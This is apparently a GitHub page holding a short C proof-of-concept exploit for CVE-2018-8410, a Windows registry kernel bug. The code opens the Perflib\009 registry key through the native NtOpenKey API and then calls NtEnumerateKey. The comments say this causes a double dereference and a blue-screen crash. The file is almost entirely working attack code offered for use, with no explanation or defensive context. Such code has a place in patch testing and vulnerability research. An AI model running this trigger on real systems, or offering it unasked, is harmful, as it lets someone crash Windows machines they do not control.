-
Notifications
You must be signed in to change notification settings - Fork 19
/
CVE-2018-8410
52 lines (45 loc) · 1.62 KB
/
CVE-2018-8410
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#include <SDKDDKVer.h>
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include <winternl.h>
typedef NTSTATUS (NTAPI *lpfnNtOpenKey)(_Out_ PHANDLE KeyHandle, _In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSTATUS (NTAPI *lpfnNtEnumerateKey)(_In_ HANDLE KeyHandle, _In_ ULONG Index, _In_ ULONG KeyInfoClass,
_Out_ PVOID KeyInformation, _In_ ULONG Length, _Out_ PULONG ResultLength);
#define _KeyBasicInformation 0
int main()
{
static UNICODE_STRING usKey = {
74 * 2,
74 * 2,
(PWSTR)L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\009"
};
lpfnNtOpenKey fnNtOpenKey;
lpfnNtEnumerateKey fnNtEnumerateKey;
HINSTANCE hNtDll;
OBJECT_ATTRIBUTES sObjAttr;
NTSTATUS ntstatus;
HANDLE hKey;
BYTE buf[2048];
ULONG RetLength;
//get ntapi
hNtDll = ::GetModuleHandleW(L"ntdll.dll");
fnNtOpenKey = (lpfnNtOpenKey)::GetProcAddress(hNtDll, "NtOpenKey");
fnNtEnumerateKey = (lpfnNtEnumerateKey)::GetProcAddress(hNtDll, "NtEnumerateKey");
//open a predefined key
memset(&sObjAttr, 0, sizeof(sObjAttr));
sObjAttr.Length = (ULONG)sizeof(sObjAttr);
sObjAttr.Attributes = OBJ_CASE_INSENSITIVE;
sObjAttr.ObjectName = &usKey;
ntstatus = fnNtOpenKey(&hKey, KEY_READ, &sObjAttr);
if (NT_SUCCESS(ntstatus))
{
//make a call to some registry api
//it will ref the object BUT deref TWICE!!!
ntstatus = fnNtEnumerateKey(hKey, 0, _KeyBasicInformation, buf, 2048, &RetLength);
//prepare for BSOD!
::RegCloseKey((HKEY)hKey);
}
return 0;
}